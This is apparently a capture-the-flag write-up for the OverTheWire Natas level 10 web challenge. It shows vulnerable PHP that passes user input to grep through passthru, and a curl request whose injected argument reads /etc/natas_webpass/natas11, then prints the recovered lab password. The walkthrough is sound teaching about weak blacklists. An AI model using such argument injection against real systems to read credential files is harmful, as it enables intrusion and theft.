curl -u natas10:t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu http://natas10.natas.labs.overthewire.org

Body:

<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

Again, inspect index-source.html.

curl -u natas10:t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu http://natas10.natas.labs.overthewire.org/index-source.html | w3m -T text/html
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

Sanitization here is pretty weak they only block ;, |, and &. Everything else including spaces, ., and # still gets dropped straight into passthru("grep -i $key dictionary.txt"), so $key is really one big shell snippet.

You can start simple a needle of just . becomes:

grep -i . dictionary.txt

And . matches every line so you dump the whole word list. From there, expand the needle to something like:

. /etc/natas_webpass/natas11 #.

What actually runs is along the lines of:

grep -i . /etc/natas_webpass/natas11 # dictionary.txt

The # comments out dictionary.txt, and you get the flag from the passwd file instead.

curl -u natas10:t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu http://natas10.natas.labs.overthewire.org/ -d "needle=. /etc/natas_webpass/natas11 #&submit="

Body:

<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

Don’t rely on blacklists alone, whitelist when you can. Even if you mix both, if you’re still slapping user input into shell commands unsafely, a single character you forgot to ban can still blow the whole thing up.

Password for natas11: UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk